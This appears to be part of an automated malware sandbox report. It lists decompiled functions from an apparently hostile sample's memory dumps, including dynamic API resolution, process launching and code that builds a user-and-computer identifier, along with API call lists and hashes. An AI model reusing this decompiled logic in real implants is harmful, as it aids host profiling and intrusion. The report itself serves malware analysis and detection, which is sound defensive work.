                                                                                                                                  • _free.LIBCMT ref: 6E93B314
                                                                                                                                  • _free.LIBCMT ref: 6E93B31F
                                                                                                                                  • _free.LIBCMT ref: 6E93B341
                                                                                                                                  • _free.LIBCMT ref: 6E93B354
                                                                                                                                  • _free.LIBCMT ref: 6E93B362
                                                                                                                                  • _free.LIBCMT ref: 6E93B36D
                                                                                                                                  • _free.LIBCMT ref: 6E93B3A5
                                                                                                                                  • _free.LIBCMT ref: 6E93B3AC
                                                                                                                                  • _free.LIBCMT ref: 6E93B3C9
                                                                                                                                  • _free.LIBCMT ref: 6E93B3E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 161543041-0
                                                                                                                                  • Opcode ID: 36c439e65503281ff56caf0f362879e1a684c89655b705a5ebc98305c565c78b
                                                                                                                                  • Instruction ID: eb78d8570a4bbdc9c95a2e08f4bf35dd40646a14c0041922e4eb7bc93e1da6a4
                                                                                                                                  • Opcode Fuzzy Hash: 36c439e65503281ff56caf0f362879e1a684c89655b705a5ebc98305c565c78b
                                                                                                                                  • Instruction Fuzzy Hash: FB317E31605A219FEB609BB9E844BDAB3FCAF51354F744819E454D6269EF30EC54CF10
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 73%
                                                                                                                                  			E00A31000(void* __eax, void* __ecx) {
                                                                                                                                  				long _v8;
                                                                                                                                  				char _v12;
                                                                                                                                  				void* _v16;
                                                                                                                                  				void* _v28;
                                                                                                                                  				long _v32;
                                                                                                                                  				void _v104;
                                                                                                                                  				char _v108;
                                                                                                                                  				long _t36;
                                                                                                                                  				intOrPtr _t40;
                                                                                                                                  				intOrPtr _t47;
                                                                                                                                  				intOrPtr _t50;
                                                                                                                                  				void* _t58;
                                                                                                                                  				void* _t68;
                                                                                                                                  				intOrPtr* _t70;
                                                                                                                                  				intOrPtr* _t71;
                                                                                                                                  
                                                                                                                                  				_t1 = __eax + 0x14; // 0x74183966
                                                                                                                                  				_t69 =  *_t1;
                                                                                                                                  				_t36 = E00A34837(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
                                                                                                                                  				_v8 = _t36;
                                                                                                                                  				if(_t36 != 0) {
                                                                                                                                  					L12:
                                                                                                                                  					return _v8;
                                                                                                                                  				}
                                                                                                                                  				E00A3A938( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
                                                                                                                                  				_t40 = _v12(_v12);
                                                                                                                                  				_v8 = _t40;
                                                                                                                                  				if(_t40 == 0 && ( *0xa3d298 & 0x00000001) != 0) {
                                                                                                                                  					_v32 = 0;
                                                                                                                                  					asm("stosd");
                                                                                                                                  					asm("stosd");
                                                                                                                                  					asm("stosd");
                                                                                                                                  					_v108 = 0;
                                                                                                                                  					memset( &_v104, 0, 0x40);
                                                                                                                                  					_t47 =  *0xa3d2e0; // 0x296a5a8
                                                                                                                                  					_t18 = _t47 + 0xa3e3b3; // 0x73797325
                                                                                                                                  					_t68 = E00A32291(_t18);
                                                                                                                                  					if(_t68 == 0) {
                                                                                                                                  						_v8 = 8;
                                                                                                                                  					} else {
                                                                                                                                  						_t50 =  *0xa3d2e0; // 0x296a5a8
                                                                                                                                  						_t19 = _t50 + 0xa3e760; // 0x33a8d08
                                                                                                                                  						_t20 = _t50 + 0xa3e0af; // 0x4e52454b
                                                                                                                                  						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
                                                                                                                                  						if(_t71 == 0) {
                                                                                                                                  							_v8 = 0x7f;
                                                                                                                                  						} else {
                                                                                                                                  							_v108 = 0x44;
                                                                                                                                  							E00A334C7();
                                                                                                                                  							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
                                                                                                                                  							_push(1);
                                                                                                                                  							E00A334C7();
                                                                                                                                  							if(_t58 == 0) {
                                                                                                                                  								_v8 = GetLastError();
                                                                                                                                  							} else {
                                                                                                                                  								CloseHandle(_v28);
                                                                                                                                  								CloseHandle(_v32);
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  						HeapFree( *0xa3d270, 0, _t68);
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  				_t70 = _v16;
                                                                                                                                  				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
                                                                                                                                  				E00A34AAB(_t70);
                                                                                                                                  				goto L12;
                                                                                                                                  			}



















                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00A34837: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,00A3101C,?,00000001,?,?,00000000,00000000), ref: 00A3485C
                                                                                                                                    • Part of subcall function 00A34837: GetProcAddress.KERNEL32(00000000,7243775A), ref: 00A3487E
                                                                                                                                    • Part of subcall function 00A34837: GetProcAddress.KERNEL32(00000000,614D775A), ref: 00A34894
                                                                                                                                    • Part of subcall function 00A34837: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 00A348AA
                                                                                                                                    • Part of subcall function 00A34837: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 00A348C0
                                                                                                                                    • Part of subcall function 00A34837: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 00A348D6
                                                                                                                                  • memset.NTDLL ref: 00A3106A
                                                                                                                                    • Part of subcall function 00A32291: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,00A31083,73797325), ref: 00A322A2
                                                                                                                                    • Part of subcall function 00A32291: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 00A322BC
                                                                                                                                  • GetModuleHandleA.KERNEL32(4E52454B,033A8D08,73797325), ref: 00A310A0
                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00A310A7
                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000), ref: 00A3110F
                                                                                                                                    • Part of subcall function 00A334C7: GetProcAddress.KERNEL32(36776F57,00A35B13), ref: 00A334E2
                                                                                                                                  • CloseHandle.KERNEL32(00000000,00000001), ref: 00A310EC
                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00A310F1
                                                                                                                                  • GetLastError.KERNEL32(00000001), ref: 00A310F5
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
                                                                                                                                  • String ID: Ut$@MtNt
                                                                                                                                  • API String ID: 3075724336-969920318
                                                                                                                                  • Opcode ID: 8ea00891eb63904856405a56b79c96a79c3b74cecc45da32176b078d0dcde587
                                                                                                                                  • Instruction ID: be62e6b62ff3e03af1829461bf5433892607631d79d8a4ef2c9fe2f9c29f0026
                                                                                                                                  • Opcode Fuzzy Hash: 8ea00891eb63904856405a56b79c96a79c3b74cecc45da32176b078d0dcde587
                                                                                                                                  • Instruction Fuzzy Hash: 58313CB6800208EFDB21EFE4DD89EDEBBBCEB08354F104569F645A7161D630AE55CB60
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 27%
                                                                                                                                  			E00A35F64(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                                                                                                                  				intOrPtr _v8;
                                                                                                                                  				intOrPtr _v12;
                                                                                                                                  				long _v16;
                                                                                                                                  				intOrPtr _v20;
                                                                                                                                  				signed int _v24;
                                                                                                                                  				void* __esi;
                                                                                                                                  				long _t43;
                                                                                                                                  				intOrPtr _t44;
                                                                                                                                  				intOrPtr _t46;
                                                                                                                                  				void* _t48;
                                                                                                                                  				void* _t49;
                                                                                                                                  				void* _t50;
                                                                                                                                  				intOrPtr _t54;
                                                                                                                                  				intOrPtr _t57;
                                                                                                                                  				void* _t58;
                                                                                                                                  				void* _t59;
                                                                                                                                  				void* _t60;
                                                                                                                                  				intOrPtr _t66;
                                                                                                                                  				void* _t71;
                                                                                                                                  				void* _t74;
                                                                                                                                  				intOrPtr _t75;
                                                                                                                                  				void* _t77;
                                                                                                                                  				intOrPtr _t79;
                                                                                                                                  				intOrPtr* _t80;
                                                                                                                                  				intOrPtr _t91;
                                                                                                                                  
                                                                                                                                  				_t79 =  *0xa3d37c; // 0x33a9818
                                                                                                                                  				_v24 = 8;
                                                                                                                                  				_t43 = GetTickCount();
                                                                                                                                  				_push(5);
                                                                                                                                  				_t74 = 0xa;
                                                                                                                                  				_v16 = _t43;
                                                                                                                                  				_t44 = E00A33A69(_t74,  &_v16);
                                                                                                                                  				_v8 = _t44;
                                                                                                                                  				if(_t44 == 0) {
                                                                                                                                  					_v8 = 0xa3c1ac;
                                                                                                                                  				}
                                                                                                                                  				_t46 = E00A351DA(_t79);
                                                                                                                                  				_v12 = _t46;
                                                                                                                                  				if(_t46 != 0) {
                                                                                                                                  					_t80 = __imp__;
                                                                                                                                  					_t48 =  *_t80(_v8, _t71);
                                                                                                                                  					_t49 =  *_t80(_v12);
                                                                                                                                  					_t50 =  *_t80(_a4);
                                                                                                                                  					_t54 = E00A375F6(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
                                                                                                                                  					_v20 = _t54;
                                                                                                                                  					if(_t54 != 0) {
                                                                                                                                  						_t75 =  *0xa3d2e0; // 0x296a5a8
                                                                                                                                  						_t16 = _t75 + 0xa3eb10; // 0x530025
                                                                                                                                  						 *0xa3d118(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
                                                                                                                                  						_push(4);
                                                                                                                                  						_t77 = 5;
                                                                                                                                  						_t57 = E00A33A69(_t77,  &_v16);
                                                                                                                                  						_v8 = _t57;
                                                                                                                                  						if(_t57 == 0) {
                                                                                                                                  							_v8 = 0xa3c1b0;
                                                                                                                                  						}
                                                                                                                                  						_t58 =  *_t80(_v8);
                                                                                                                                  						_t59 =  *_t80(_v12);
                                                                                                                                  						_t60 =  *_t80(_a4);
                                                                                                                                  						_t91 = E00A375F6(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
                                                                                                                                  						if(_t91 == 0) {
                                                                                                                                  							E00A34AAB(_v20);
                                                                                                                                  						} else {
                                                                                                                                  							_t66 =  *0xa3d2e0; // 0x296a5a8
                                                                                                                                  							_t31 = _t66 + 0xa3ec30; // 0x73006d
                                                                                                                                  							 *0xa3d118(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
                                                                                                                                  							 *_a16 = _v20;
                                                                                                                                  							_v24 = _v24 & 0x00000000;
                                                                                                                                  							 *_a20 = _t91;
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					E00A34AAB(_v12);
                                                                                                                                  				}
                                                                                                                                  				return _v24;
                                                                                                                                  			}





























                                                                                                                                  APIs
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00A35F79
                                                                                                                                  • lstrlen.KERNEL32(?,80000002,00000005), ref: 00A35FB9
                                                                                                                                  • lstrlen.KERNEL32(00000000), ref: 00A35FC2
                                                                                                                                  • lstrlen.KERNEL32(00000000), ref: 00A35FC9
                                                                                                                                  • lstrlenW.KERNEL32(80000002), ref: 00A35FD6
                                                                                                                                  • lstrlen.KERNEL32(?,00000004), ref: 00A36036
                                                                                                                                  • lstrlen.KERNEL32(?), ref: 00A3603F
                                                                                                                                  • lstrlen.KERNEL32(?), ref: 00A36046
                                                                                                                                  • lstrlenW.KERNEL32(?), ref: 00A3604D
                                                                                                                                    • Part of subcall function 00A34AAB: RtlFreeHeap.NTDLL(00000000,00000000,00A35012,00000000,?,?,00000000), ref: 00A34AB7
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrlen$CountFreeHeapTick
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2535036572-0
                                                                                                                                  • Opcode ID: 5b7c797715328fedeacb0753cf53989bd224ca01af6dece6c72eab78eb9d0983
                                                                                                                                  • Instruction ID: 196f0afd4079fe5c03cd289ea360321e828a760721c54d6df9e7cafafe4dfa49
                                                                                                                                  • Opcode Fuzzy Hash: 5b7c797715328fedeacb0753cf53989bd224ca01af6dece6c72eab78eb9d0983
                                                                                                                                  • Instruction Fuzzy Hash: D6414576D00209FBCF12AFE8DD09A9EBBB5EF44354F158055F904A7221D7369A21EBA0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 6E92F299: GetLastError.KERNEL32(00000000,00000000,?,6E927CF9,?,?,00000003,?,6E8F1083,6E8F10F4,?,6E8F0EE0,00000000,00000000,00000000,00000004), ref: 6E92F29E
                                                                                                                                    • Part of subcall function 6E92F299: SetLastError.KERNEL32(00000000,6E97A1A0,000000FF,?,6E927CF9,?,?,00000003,?,6E8F1083,6E8F10F4,?,6E8F0EE0,00000000,00000000,00000000), ref: 6E92F33C
                                                                                                                                  • _free.LIBCMT ref: 6E9332BF
                                                                                                                                  • _free.LIBCMT ref: 6E9332D8
                                                                                                                                  • _free.LIBCMT ref: 6E933316
                                                                                                                                  • _free.LIBCMT ref: 6E93331F
                                                                                                                                  • _free.LIBCMT ref: 6E93332B
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$ErrorLast
                                                                                                                                  • String ID: C
                                                                                                                                  • API String ID: 3291180501-1037565863
                                                                                                                                  • Opcode ID: d38a72fb83b9e2ddee225bc97fb86dc0483a5fbff13c3b5b6243b29c4e28c77d
                                                                                                                                  • Instruction ID: ed8a075b3687f1ef9bae86a4afd6dfa99254e542ee22670e7f213bffc20a41de
                                                                                                                                  • Opcode Fuzzy Hash: d38a72fb83b9e2ddee225bc97fb86dc0483a5fbff13c3b5b6243b29c4e28c77d
                                                                                                                                  • Instruction Fuzzy Hash: 51C16F7594122ADFDB24CF68C898A9DB3B8FF49304F6045AAD819A7354D731EE90CF40
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E00A3137A() {
                                                                                                                                  				long _v8;
                                                                                                                                  				long _v12;
                                                                                                                                  				int _v16;
                                                                                                                                  				long _t39;
                                                                                                                                  				long _t43;
                                                                                                                                  				signed int _t47;
                                                                                                                                  				short _t51;
                                                                                                                                  				signed int _t52;
                                                                                                                                  				int _t56;
                                                                                                                                  				int _t57;
                                                                                                                                  				char* _t64;
                                                                                                                                  				short* _t67;
                                                                                                                                  
                                                                                                                                  				_v16 = 0;
                                                                                                                                  				_v8 = 0;
                                                                                                                                  				GetUserNameW(0,  &_v8);
                                                                                                                                  				_t39 = _v8;
                                                                                                                                  				if(_t39 != 0) {
                                                                                                                                  					_v12 = _t39;
                                                                                                                                  					_v8 = 0;
                                                                                                                                  					GetComputerNameW(0,  &_v8);
                                                                                                                                  					_t43 = _v8;
                                                                                                                                  					if(_t43 != 0) {
                                                                                                                                  						_v12 = _v12 + _t43 + 2;
                                                                                                                                  						_t64 = E00A375F6(_v12 + _t43 + 2 << 2);
                                                                                                                                  						if(_t64 != 0) {
                                                                                                                                  							_t47 = _v12;
                                                                                                                                  							_t67 = _t64 + _t47 * 2;
                                                                                                                                  							_v8 = _t47;
                                                                                                                                  							if(GetUserNameW(_t67,  &_v8) == 0) {
                                                                                                                                  								L7:
                                                                                                                                  								E00A34AAB(_t64);
                                                                                                                                  							} else {
                                                                                                                                  								_t51 = 0x40;
                                                                                                                                  								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
                                                                                                                                  								_t52 = _v8;
                                                                                                                                  								_v12 = _v12 - _t52;
                                                                                                                                  								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
                                                                                                                                  									goto L7;
                                                                                                                                  								} else {
                                                                                                                                  									_t56 = _v12 + _v8;
                                                                                                                                  									_t31 = _t56 + 2; // 0xa34565
                                                                                                                                  									_v12 = _t56;
                                                                                                                                  									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
                                                                                                                                  									_v8 = _t57;
                                                                                                                                  									if(_t57 == 0) {
                                                                                                                                  										goto L7;
                                                                                                                                  									} else {
                                                                                                                                  										_t64[_t57] = 0;
                                                                                                                                  										_v16 = _t64;
                                                                                                                                  									}
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  				return _v16;
                                                                                                                                  			}
















                                                                                                                                  APIs
                                                                                                                                  • GetUserNameW.ADVAPI32(00000000,00A34563), ref: 00A3138E
                                                                                                                                  • GetComputerNameW.KERNEL32(00000000,00A34563), ref: 00A313AA
                                                                                                                                    • Part of subcall function 00A375F6: RtlAllocateHeap.NTDLL(00000000,00000000,00A34F70), ref: 00A37602
                                                                                                                                  • GetUserNameW.ADVAPI32(00000000,00A34563), ref: 00A313E4
                                                                                                                                  • GetComputerNameW.KERNEL32(00A34563,?), ref: 00A31407
                                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00A34563,00000000,00A34565,00000000,00000000,?,?,00A34563), ref: 00A3142A
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                                                                                                                                  • String ID: @ht
                                                                                                                                  • API String ID: 3850880919-1371871952
                                                                                                                                  • Opcode ID: e81e7f7b3b414e44417966d4c1c749ea1594b98f04ab4d745c5c9c679800dbf8
                                                                                                                                  • Instruction ID: e5724f2d154aa9c14fc3fbd95bba3e11c2c41e03cc584fac8e35d8df24acc093
                                                                                                                                  • Opcode Fuzzy Hash: e81e7f7b3b414e44417966d4c1c749ea1594b98f04ab4d745c5c9c679800dbf8
                                                                                                                                  • Instruction Fuzzy Hash: 3821D8B6900248FFCB11DFE9D985DAEBBB9EF45700F5044AAF502E7200DA309B45DB11
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 63%
                                                                                                                                  			E00A31974(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                  				intOrPtr _v8;
                                                                                                                                  				intOrPtr _t9;
                                                                                                                                  				intOrPtr _t13;
                                                                                                                                  				char* _t28;
                                                                                                                                  				void* _t33;
                                                                                                                                  				void* _t34;
                                                                                                                                  				char* _t36;
                                                                                                                                  				intOrPtr* _t40;
                                                                                                                                  				char* _t41;
                                                                                                                                  				char* _t42;
                                                                                                                                  				char* _t43;
                                                                                                                                  
                                                                                                                                  				_t34 = __edx;
                                                                                                                                  				_push(__ecx);
                                                                                                                                  				_t9 =  *0xa3d2e0; // 0x296a5a8
                                                                                                                                  				_t1 = _t9 + 0xa3e62c; // 0x253d7325
                                                                                                                                  				_t36 = 0;
                                                                                                                                  				_t28 = E00A343A8(__ecx, _t1);
                                                                                                                                  				if(_t28 != 0) {
                                                                                                                                  					_t40 = __imp__;
                                                                                                                                  					_t13 =  *_t40(_t28);
                                                                                                                                  					_v8 = _t13;
                                                                                                                                  					_t41 = E00A375F6(_v8 +  *_t40(_a4) + 1);
                                                                                                                                  					if(_t41 != 0) {
                                                                                                                                  						strcpy(_t41, _t28);
                                                                                                                                  						_pop(_t33);
                                                                                                                                  						__imp__(_t41, _a4);
                                                                                                                                  						_t36 = E00A35601(_t34, _t41, _a8);
                                                                                                                                  						E00A34AAB(_t41);
                                                                                                                                  						_t42 = E00A3756E(StrTrimA(_t36, "="), _t36);
                                                                                                                                  						if(_t42 != 0) {
                                                                                                                                  							E00A34AAB(_t36);
                                                                                                                                  							_t36 = _t42;
                                                                                                                                  						}
                                                                                                                                  						_t43 = E00A326DD(_t36, _t33);
                                                                                                                                  						if(_t43 != 0) {
                                                                                                                                  							E00A34AAB(_t36);
                                                                                                                                  							_t36 = _t43;
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					E00A34AAB(_t28);
                                                                                                                                  				}
                                                                                                                                  				return _t36;
                                                                                                                                  			}















                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00A343A8: lstrlen.KERNEL32(00000000,00000000,00000000,7691C740,?,?,?,00A3198E,253D7325,00000000,00000000,7691C740,?,?,00A34653,?), ref: 00A3440F
                                                                                                                                    • Part of subcall function 00A343A8: sprintf.NTDLL ref: 00A34430
                                                                                                                                  • lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7691C740,?,?,00A34653,?,033A95B0), ref: 00A3199F
                                                                                                                                  • lstrlen.KERNEL32(?,?,?,00A34653,?,033A95B0), ref: 00A319A7
                                                                                                                                    • Part of subcall function 00A375F6: RtlAllocateHeap.NTDLL(00000000,00000000,00A34F70), ref: 00A37602
                                                                                                                                  • strcpy.NTDLL ref: 00A319BE
                                                                                                                                  • lstrcat.KERNEL32(00000000,?), ref: 00A319C9
                                                                                                                                    • Part of subcall function 00A35601: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,00A319D8,00000000,?,?,?,00A34653,?,033A95B0), ref: 00A35618
                                                                                                                                    • Part of subcall function 00A34AAB: RtlFreeHeap.NTDLL(00000000,00000000,00A35012,00000000,?,?,00000000), ref: 00A34AB7
                                                                                                                                  • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,00A34653,?,033A95B0), ref: 00A319E6
                                                                                                                                    • Part of subcall function 00A3756E: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,00A319F2,00000000,?,?,00A34653,?,033A95B0), ref: 00A37578
                                                                                                                                    • Part of subcall function 00A3756E: _snprintf.NTDLL ref: 00A375D6
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                                                                                                                  • String ID: =
                                                                                                                                  • API String ID: 2864389247-1428090586
                                                                                                                                  • Opcode ID: 1c2a43952ec96244c997ed6d56f9dcc1b34c1944ab091518fd47d8ba0bdc988e
                                                                                                                                  • Instruction ID: cdd41be8685c64600e60a80276a3cdaf7c82b61c21132f71b5e55e9b66633db6
                                                                                                                                  • Opcode Fuzzy Hash: 1c2a43952ec96244c997ed6d56f9dcc1b34c1944ab091518fd47d8ba0bdc988e
                                                                                                                                  • Instruction Fuzzy Hash: AE11C233912624BB8612B7F49D86C6F77AD9E897A0B054015FA01AB202DE34DD0247A4
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E905688
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E905692
                                                                                                                                  • int.LIBCPMT ref: 6E9056A9
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E9056E3
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E905703
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E905710
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E90571D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3920336645-0
                                                                                                                                  • Opcode ID: 47fbccbaf4d3c66af652bee8934bc126aca6ac8b1d239c66fc3682141d645f9f
                                                                                                                                  • Instruction ID: 70cb1188cd3bd5326050782a795dcf9589d5bb0d0713073cc7b52933c554cb35
                                                                                                                                  • Opcode Fuzzy Hash: 47fbccbaf4d3c66af652bee8934bc126aca6ac8b1d239c66fc3682141d645f9f
                                                                                                                                  • Instruction Fuzzy Hash: 9921BE71900619DBCF12CFE8C9446EEBBB9AF94758F504D0DE8506B280CBB0D946CF81
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F7DA6
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F7DB0
                                                                                                                                  • int.LIBCPMT ref: 6E8F7DC7
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F7E01
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F7E21
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F7E2E
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F7E3B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3920336645-0
                                                                                                                                  • Opcode ID: 8a0dba55f821380c3583f06942485365aa4d17700697163c691d3ebb1b63ee7a
                                                                                                                                  • Instruction ID: 62cd371ed5acbed92dd8687ec074053403f710fd931aeef3bd0212afc5d21419
                                                                                                                                  • Opcode Fuzzy Hash: 8a0dba55f821380c3583f06942485365aa4d17700697163c691d3ebb1b63ee7a
                                                                                                                                  • Instruction Fuzzy Hash: 8F21C37190061ADBCF02DFE8C9556EE7BB9AF45798F104D0EE8506B280DBB4DE06CB91
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 6E93D196: _free.LIBCMT ref: 6E93D1BB
                                                                                                                                  • _free.LIBCMT ref: 6E93D4F9
                                                                                                                                    • Part of subcall function 6E931434: HeapFree.KERNEL32(00000000,00000000,?,6E93D1C0,?,00000000,?,?,?,6E93D4C4,?,00000007,?,?,6E93B43B,?), ref: 6E93144A
                                                                                                                                    • Part of subcall function 6E931434: GetLastError.KERNEL32(?,?,6E93D1C0,?,00000000,?,?,?,6E93D4C4,?,00000007,?,?,6E93B43B,?,?), ref: 6E93145C
                                                                                                                                  • _free.LIBCMT ref: 6E93D504
                                                                                                                                  • _free.LIBCMT ref: 6E93D50F
                                                                                                                                  • _free.LIBCMT ref: 6E93D563
                                                                                                                                  • _free.LIBCMT ref: 6E93D56E
                                                                                                                                  • _free.LIBCMT ref: 6E93D579
                                                                                                                                  • _free.LIBCMT ref: 6E93D584
                                                                                                                                  Memory Dump Source
